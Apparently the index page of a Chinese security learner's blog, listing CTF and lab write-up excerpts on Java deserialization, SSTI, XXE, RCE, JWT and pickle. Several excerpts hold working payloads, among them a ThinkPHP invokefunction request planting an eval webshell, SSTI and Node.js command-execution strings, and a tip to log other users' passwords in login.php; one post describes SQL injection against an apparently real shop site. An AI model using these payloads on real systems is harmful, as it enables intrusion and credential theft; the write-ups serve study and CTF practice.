自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

网安菜鸡学习笔记

V3g3t4ble's Blog

  • 博客(25)
  • 收藏
  • 关注

原创 ctfshow刷题(Java反序列化)

CTFshowJava反序列化web846urldns链import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.ObjectOutput; import java.io.ObjectOutputStream; import java.lang.reflect.Field...

2023-07-06 20:37:00 377

原创 Java反射

一切的Java类都必须经过JVM加载后才能运行,而的主要作用就是Java类文件的加载。在JVM类加载器中最顶层的是是默认的类加载器,如果类加载时我们不指定类加载器的情况下,默认会使用加载类,返回的系统类加载器也是。

2023-07-05 15:00:01 319 1

原创 jndi

原理JNDI是给Java应用提供命名和目录的API编程接口可以访问的服务JDBCRMILDAP等等jndi访问rmi的demoimport javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import java.util.H...

2023-07-02 21:20:00 87

原创 7.1

[安洵杯 2020]Normal SSTI过滤{{}} [] config和一系列常规的字符串lipsum|attr("__globals__").get("os").popen("ls").read()用{%print()%}+unicode编码绕过构造lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u007...

2023-07-02 21:20:00 106

原创 6.29

dg-publish: true[CISCN 2023 初赛]go_session[session伪造]三个路由r.GET("/", route.Index) r.GET("/admin", route.Admin) r.GET("/flask", route.Flask)逐个分析route包里面首先获取了环境变量中的SESSION_KEYfunc Index(c *gin...

2023-06-29 23:37:00 102

原创 记一次靶场渗透

外围突破thinkphp 5.0.22GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak.php&vars[1][]=%3C%3Fphp+%40eval%28%24_POST...

2023-05-30 23:33:00 41

原创 ctfshow终极考核

信息收集这个环境就只涉及目录扫描了[18:04:02] 200 - 43B - /.bowerrc[18:04:03] 200 - 34B - /.gitignore[18:04:04] 200 - 2KB - /.travis.yml[18:04:24] 200 - 3KB - /page.php[18:04:28] 200 - 19B - /ro...

2023-05-24 19:52:00 109

原创 不成功的渗透测试

没发现什么功能点,vt找一下关系链找到一个类似于商城的东西,翻找了一下,发现一个购买接口http://shop.xxx.com/card/routes/shop.php?title=nvip365title存在sql注入,直接丢sqlmap得到用户名和密码 PS:密文加盐,而且解不开大佬提供的思路是生成个性化字典本地进行密文对装,未果而且还没有找到后台的登录入口最后在admin_...

2023-05-18 00:37:00 46

原创 XXE

https://xz.aliyun.com/t/3357XXEXXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他...

2023-05-10 17:19:00 35

原创 buu刷题记

[强网杯 2019]随便注?inject=-1';show databases%23?inject=-1';show tables from `supersqli`%23?inject=-1';show columns from `1919810931114514`%23得知flag在supersqli库的1919810931114514的flag列下而且select|update|d...

2023-05-09 20:02:00 51

原创 JWT

jwt(JSON Web Token) 是一串 json 格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token 里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT 可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递声明而执行的一种基于 JSON 的开放标准((RFC 7519). 该 token 被设计为紧凑且安全的,...

2023-04-03 00:48:00 40

原创 pickle反序列化

pickle是python语言的一个标准模块,实现了基本的数据序列化和反序列化。函数功能dumps对象序列化为二进制字符串dump对象序列化为文件对象loads二进制字符串反序列化为对象load从文件读取数据反序列化为对象demo# 序列化import pickleimport base64class demo(): def ...

2023-03-27 13:07:00 65

原创 NKCTF day1 Web wp

baby_php<?php error_reporting(0); class Welcome{ public $name; public $arg = 'oww!man!!'; public function __construct(){ $this->name = 'ItS SO CREAZ...

2023-03-25 19:17:00 439

原创 Nodejs

Nodejs-Web336global.process.mainModule.constructor._load('child_process').execSync('ls')eval执行代码,过滤了exec,上面的payload用不了网上搜集的payloadrequire('child_process').spawnSync('ls',['./']).stdout.toString...

2023-03-19 15:05:00 47

原创 文件包含

包含nginx日志ua写一句话日志路径/var/log/nginx/access.log绕过死亡exitphp://filterphp://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过...

2023-03-19 13:56:00 50

原创 RCE

RCE-Web32<?phperror_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); }}else{...

2023-03-12 12:33:00 48

原创 SSTI

SSTI各种绕过SSTI-Web363过滤单双引号{{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flagSSTI-Web365过滤中括号和单双引号{{url_for.__globals__.os.pope...

2023-03-12 00:10:00 39

原创 FinalHgame wp

ssti常规的sstiphp-blogadmin 12345进入后台,发一篇文章,内容填<?php eval($_POST['pass']);直接getshell然后在login.php里面加一句file_put_contents('login.txt',$username." ".$password);记录一下另一个用户的密码go-admin进后台翻来翻去发现一个读文...

2023-03-11 13:48:00 42

原创 IIS7.5解析漏洞验证脚本

from requests import *from bs4 import BeautifulSoupdef getFileLink(domain): if checkVul(domain + '/favicon.ico'): return True index = get(domain) html = BeautifulSoup(index.te...

2023-03-09 16:26:00 66

原创 HSCSEC CTF 2023部分WP

EZSSTI?name={{''.__class__.__mro__[-1].__subclasses__()}}查看所有子类from requests import *for i in range(300): url="http://4dcc7f0f-0e07-49e1-b2c8-b9ce9de9c125.race-node.hscsec.cn:8080/?name={{[]....

2023-02-12 16:18:00 313

原创 Flask算pin rce

前提条件:Debug开启来自:https://pysnow.cn/archives/170/高版本import hashlibfrom itertools import chainprobably_public_bits = [ 'root' # /etc/passwd 'flask.app', # 默认值 'Flask', # 默认值 '/...

2023-02-12 15:53:00 41

原创 phpstudy xss+csrf组合拳rce+登录入口绕过

function poc(){ $.get('/service/app/tasks.php?type=task_list',{},function(data){ var id=data.data[0].ID; $.post('/service/app/tasks.php?type=exec_task',{ tid:id },function(res2){...

2023-02-04 18:58:00 59

原创 Web10道签到题

题目1万能密码题目2弱口令 admin 123456登录后台,文件管理上传<?php system('cat /tmp/flag');?>题目3题目4F12发现include.phpinclude.php?file=php://filter/read=convert.base64-encode/resource=include.php查看文件源码,发现upload....

2023-02-03 19:58:00 202

原创 西湖论剑2023学习笔记

太菜了打不了比赛,跟着师傅们的wp学习一下Node Magical Loginflag1function Flag1Controller(req,res){ try { if(req.cookies.user === SECRET_COOKIE){ res.setHeader("This_Is_The_Flag1",flag1.toS...

2023-02-03 13:28:00 88

原创 HGAME2023部分WP

Search Commodity爆破密码admin123登录进去,Designerapp.post("/button/share", auth, async (req, res) => { const browser = await puppeteer.launch({ headless: true, executablePath: "/usr/bin/chro...

2023-02-03 13:27:00 163

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除